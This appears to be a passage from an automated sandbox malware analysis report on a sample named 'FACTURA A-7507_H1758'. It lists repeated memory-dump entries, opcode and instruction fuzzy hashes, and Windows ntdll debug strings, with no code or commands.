                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c7e3b9c0ea5930c0d0e115b52814c769c22f4b9fa5cf7e365a243e724664dd86
                                                                                                                                                                                                                          • Instruction ID: e48a9fa53195f509a2bbc77cf7986d5d06d778f3b599b9d3223e992f621cab53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e3b9c0ea5930c0d0e115b52814c769c22f4b9fa5cf7e365a243e724664dd86
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4790022160100542D50572584504616101A47D1241FD1C867A1014515ECA368996B131
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 92ef9d00ed0130e9f3012e4b9391db6579bf0ea20741409491755d35168a23ec
                                                                                                                                                                                                                          • Instruction ID: 27f2ac72838eae438a3993ea25b0fc4fb7f9bbd027dd3fcca7b7ddbfeafaa425
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92ef9d00ed0130e9f3012e4b9391db6579bf0ea20741409491755d35168a23ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9590022130100043D54472585518606501597E2301F91D856E0404514CD926885A6222
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8a05db9d214924adac14dd3e86612d402df0fc9301bb0bc589d5b20b7face483
                                                                                                                                                                                                                          • Instruction ID: 702f23ac9dfa01ec2f783a48be24a772fd190b1f11b8f42f3761908ab9f70f75
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a05db9d214924adac14dd3e86612d402df0fc9301bb0bc589d5b20b7face483
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB90043130100443D504735C570C707101547D1301FD1DC57F041451CDD777CC557131
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c47cd66fff354721423c5189e503d70735b6b31f86e3725b1c25de4fd67f0f77
                                                                                                                                                                                                                          • Instruction ID: b5b80680729257cea89511b5db823244fef23763fbbcfbcca385719f9bd1852d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c47cd66fff354721423c5189e503d70735b6b31f86e3725b1c25de4fd67f0f77
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC90022120504482D50466585508A06101547D1205F91D856A1054555DC6368855B131
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4541b1e00a2cec60c6b38f979b6cc5ad1798c28d8c3f1d98e68d7da3473297e2
                                                                                                                                                                                                                          • Instruction ID: 62e63262736500a16e3fd913218df62cc47368903f769307000c5244f46eebac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4541b1e00a2cec60c6b38f979b6cc5ad1798c28d8c3f1d98e68d7da3473297e2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E590022921300042D5847258550860A101547D2202FD1DC5AA0005518CC926886D6321
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f052ed1e4839de3d6b7222ae8f75663099e78286eedaad374028479f02cdfe1c
                                                                                                                                                                                                                          • Instruction ID: 44233b38992e0ccc4b84e365e8c816ba17382fd4595b125da7d8969fcde9f264
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f052ed1e4839de3d6b7222ae8f75663099e78286eedaad374028479f02cdfe1c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1990023124100442D54572584504606101957D1241FD1C857A0414514EC6668A5ABA61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: faae260caf03b456ca7c99a9bbf1c92db040ceb3c2f82ec089969678bce6145a
                                                                                                                                                                                                                          • Instruction ID: 52b603c931581d9bb278f4c9ca6885f9bf2f3bfc23d5a27e05be88923b27cb3e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: faae260caf03b456ca7c99a9bbf1c92db040ceb3c2f82ec089969678bce6145a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D90022121180082D60466684D14B07101547D1303F91C95AA0144514CC92688656521
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 1adc3fab8e84198b7fa39498ad0f32dcc2a81dd814f4f64eeb8187acc4f3e083
                                                                                                                                                                                                                          • Instruction ID: 3f7ff6176fe61120329a72109306c9601f9a9eee75fc7c1db28ab775d7265ba8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1adc3fab8e84198b7fa39498ad0f32dcc2a81dd814f4f64eeb8187acc4f3e083
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C90022120144482D54463584904B0F511547E2202FD1C85EA4146514CC92688596721
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 1512c65c305482bf2b3bfceac5b7f2e8f325b70a46f4f8217981e47e4c02475d
                                                                                                                                                                                                                          • Instruction ID: def03874baffdfcb6094f1322f0c4e3f31c348ac432d70c3d57be94e028b36f7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1512c65c305482bf2b3bfceac5b7f2e8f325b70a46f4f8217981e47e4c02475d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B490022124100842D54472588514707101687D1601F91C856A0014514DC627896976B1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a47526fdb3ea73c2e7ef50d2031fb577e55461aeb4e8101123c247300ff96b47
                                                                                                                                                                                                                          • Instruction ID: 806742046ba5d08823e2724e338dc3577912bd154f234336ec19faab9f81bdd1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a47526fdb3ea73c2e7ef50d2031fb577e55461aeb4e8101123c247300ff96b47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B190026134100482D50462584514B06101587E2301F91C85AE1054514DC62ACC567126
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cf6af5388b7d00f7ebb686990bd8b9276a78345494c27fec53aa96826dd4a9f0
                                                                                                                                                                                                                          • Instruction ID: be22b6e804fa30805edd22200f037be7d46cadca83dfa61dd4e427390e2d9eac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf6af5388b7d00f7ebb686990bd8b9276a78345494c27fec53aa96826dd4a9f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6890026120140443D54466584904607101547D1302F91C856A2054515ECA3A8C557135
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 2bb228671fc1ea5eba412eb9ea30f0531c5d1fb46646040fbd4632e665cb78f3
                                                                                                                                                                                                                          • Instruction ID: ee03120a049955788b36496218bc792470f907eae0391a504d4e7b5673aec42c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bb228671fc1ea5eba412eb9ea30f0531c5d1fb46646040fbd4632e665cb78f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A90023120140442D50462584908747101547D1302F91C856A5154515EC676C8957531
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cbf975d9b6b8790242887b675db74adf96efed0f09d9f717e061f966922a0935
                                                                                                                                                                                                                          • Instruction ID: 3dfe74c0a1835deca40771c0c6939adae816298c09055fbd4dc4b7c59d72b584
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbf975d9b6b8790242887b675db74adf96efed0f09d9f717e061f966922a0935
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A39002216010008245447268894490650156BE2211B91C966A0988510DC56A88696665
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e6db6306dadb4e3cb6e4017a56c5f16822be8e3da4c558f88db137a4c8528cc4
                                                                                                                                                                                                                          • Instruction ID: dd6e5191f9702a38efb0cef18e54c30f2ef90e601ef178cca47c10d443939bdb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6db6306dadb4e3cb6e4017a56c5f16822be8e3da4c558f88db137a4c8528cc4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4190026121100082D50862584504706105547E2201F91C857A2144514CC53A8C656125
Memory Dump Source
• Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
• Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          • Instruction ID: f2d02375351643f3b1740d0240114cef6667129272ac73df912c661cd699781b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23f923bb717fc0c7af4b299e0a062c0854af950cecb7f8c55971914031d30f74
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04900225221000420549A658070450B145557D73517D1C85AF1406550CC63288696321
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c49f133ae4a5d064876777594def408899d07131adffa1046609e894d7137b22
                                                                                                                                                                                                                          • Instruction ID: 1d48db33d0ad417a49d965c9904932d4c76142eef3365ce62e0cf1a28129ab41
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c49f133ae4a5d064876777594def408899d07131adffa1046609e894d7137b22
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9190023160500842D55472584514746101547D1301F91C856A0014614DC7668A5976A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7cf55bf74ebedddfd746a86fe6a0ee020f3ea54772c6598666634c664590f923
                                                                                                                                                                                                                          • Instruction ID: 66608b8df46a4331a032f7cb963801655423700b53b4e751849c5f2f0069accc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cf55bf74ebedddfd746a86fe6a0ee020f3ea54772c6598666634c664590f923
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B90026120200043450972584514616501A47E1201F91C866E1004550DC53688957125
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c18fffc1bc7c21bf8f62d64035c0e785639c98ed132d3f0702560d70b552d516
                                                                                                                                                                                                                          • Instruction ID: 0a5a25f0f276ba0d22989c75ad2af317657c66ffb16957a18577a64d478bc9db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c18fffc1bc7c21bf8f62d64035c0e785639c98ed132d3f0702560d70b552d516
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8990023120100842D50862584904686101547D1301F91C856A6014615ED67688957131
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                          • Instruction ID: a5e8068f0c35dcd2e67e3141782173290366636cd5d90f4db9fee0df750730d9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                          • Instruction Fuzzy Hash:

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: HEAP:
                                                                                                                                                                                                                          • API String ID: 3446177414-2466845122

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 354A4592
                                                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 354A4530
                                                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 354A4507
                                                                                                                                                                                                                          • ExecuteOptions, xrefs: 354A44AB
                                                                                                                                                                                                                          • Execute=1, xrefs: 354A451E
                                                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 354A454D
                                                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 354A4460
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35497807
                                                                                                                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 354977DD, 35497802
                                                                                                                                                                                                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 354978F3
                                                                                                                                                                                                                          • SsHd, xrefs: 3544A304
                                                                                                                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 354977E2
                                                                                                                                                                                                                          • Actx , xrefs: 35497819, 35497880
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                                                          • API String ID: 0-1988757188
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
